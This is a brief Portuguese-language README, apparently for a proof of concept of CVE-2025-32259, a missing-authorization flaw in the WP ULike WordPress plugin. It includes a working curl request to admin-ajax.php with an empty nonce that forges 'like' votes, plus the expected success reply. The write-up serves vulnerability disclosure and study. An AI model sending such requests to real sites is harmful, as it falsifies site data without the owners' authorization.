
Nas versões afetadas do plugin WP ULike, não há uma verificação de autorização adequada antes de permitir certas ações AJAX ou manipulações de votos. Isso permite que usuários não autenticados interajam com o plugin de maneiras que apenas usuários logados deveriam conseguir — potencialmente distorcendo votos ou injetando dados enganosos.
🔬 Um PoC simples demonstrando CVE-2025-32259 no plugin WP ULike para WordPress.
🚨 Uso educacional apenas – não teste em sistemas sem autorização explícita.
WP ULike é um plugin popular do WordPress que permite aos usuários curtir conteúdo em um site. As versões até 4.7.9.1 sofrem de uma vulnerabilidade de autorização ausente, permitindo que usuários não autenticados falsifiquem ações de "curtir" por meio de requisições AJAX.
A vulnerabilidade permite que usuários não autenticados interajam com o endpoint AJAX e curtam qualquer conteúdo (post, comentário, etc.) sem permissão.
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
-d "action=wp_ulike_process" \
-d "method=likeThis" \
-d "id=1" \
-d "type=post" \
-d "nonce=" \
-H "Content-Type: application/x-www-form-urlencoded"
Substitua id=1 por um ID de post válido.
Uma resposta bem-sucedida pode ser algo como:
{"status":"success","msg":"You liked this."}